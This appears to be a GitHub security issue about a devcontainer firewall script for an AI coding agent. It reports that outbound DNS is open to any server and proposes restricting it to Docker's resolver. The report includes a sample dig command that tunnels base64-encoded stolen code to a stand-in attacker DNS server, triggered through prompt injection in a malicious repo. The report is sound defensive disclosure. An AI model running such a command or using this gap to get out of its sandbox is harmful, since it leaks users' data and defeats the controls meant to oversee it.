Devcontainer firewall allows DNS to arbitrary servers — enables data exfiltration via DNS tunneling
Summary
The devcontainer's init-firewall.sh allows outbound DNS (UDP port 53) to any destination. This enables DNS tunneling, which completely bypasses the IP-based firewall.
The issue
# init-firewall.sh, current rules:
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
iptables -A INPUT -p udp --sport 53 -j ACCEPT
These rules allow DNS queries to any server, not just Docker's internal resolver. An attacker (via prompt injection in a malicious repo) could exfiltrate data through DNS queries:
dig @attacker-dns-server.com $(echo "stolen-code" | base64).attacker.com
This works because the firewall only blocks TCP/HTTPS connections to non-whitelisted IPs — DNS traffic is completely unrestricted.
Suggested fix
Restrict DNS to Docker's internal resolver at 127.0.0.11:
iptables -A OUTPUT -p udp --dport 53 -d 127.0.0.11 -j ACCEPT
iptables -A INPUT -p udp --sport 53 -s 127.0.0.11 -j ACCEPT
# Also allow TCP DNS (some large responses fall back from UDP to TCP)
iptables -A OUTPUT -p tcp --dport 53 -d 127.0.0.11 -j ACCEPT
iptables -A INPUT -p tcp --sport 53 -s 127.0.0.11 -j ACCEPT
This still allows all domain resolution (Docker proxies DNS internally) while preventing direct queries to external DNS servers.
Impact
This affects any user relying on the devcontainer firewall for security when running claude --dangerously-skip-permissions. The firewall's "deny-by-default" strategy is undermined by this unrestricted DNS path.
This issue has 4 comments on GitHub. Read the full discussion on GitHub ↗